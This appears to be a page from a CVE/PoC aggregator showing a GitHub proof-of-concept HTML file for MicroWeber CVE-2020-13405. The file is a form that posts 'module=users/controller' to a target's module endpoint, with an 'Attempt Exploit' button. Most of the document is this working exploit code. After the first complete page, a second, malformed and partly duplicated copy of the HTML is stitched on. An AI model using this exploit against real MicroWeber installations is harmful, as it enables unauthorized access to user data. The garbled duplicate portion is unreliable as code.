4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / PoC.html HTML
<!DOCTYPE html>
<html>
<head>
  <title>MicroWeber CVE-2020-13405 PoC</title>
  <meta name="referrer" content="origin">
  <script>
    function updateForm() {
      var modulesUrl = document.getElementById("module_url").value.trim();
      
      if (isValidURL(modulesUrl)) {
        document.getElementById("exploit_form").action = modulesUrl;
        return true;
      } else {
        alert("Kindly provide a valid URL in the MicroWeber Module Endpoint URL field before proceeding with the operation.");
        return false;
      }
    }

    function isValidURL(url) {
      const urlPattern = /^https?:\/\/.+/i; // Regular expression pattern for http:// or https://
  return urlPattern.test(url);
    }
  </script>
</head>
<body>
  <h1 style="color:red;">MicroWeber CVE-2020-13405 PoC</h1>
  <h2 style="color:red;">Base Score: 7.5 HIGH</h2>

  <form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
    <label for="module_url">MicroWeber Module Endpoint URL</label>
    <input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
    <input type="submit" value="Attempt Exploit" onclick="return updateForm()">
    <input type="hidden" id="module" name="module" value="users/controller">
  </form>
</body>
</html>

      </script>
   </head>
   <h1 style="color:red;">MicroWeber CVE-2020-13405 PoC</h1>
   <h1 style="color:red;">Base Score:  7.5 HIGH</h1>
   <h3 style="color:red;"></h3>
   
   </br>
   
   <label for="fname">MicroWeber Module Endpoint URL</label>
   <input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
   
   <form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
      <input type="submit" value="Attempt Exploit" onclick="return updateForm()">
	  <input type="hidden" id="module" name="module" value="users/controller">
   </form>
   
</html>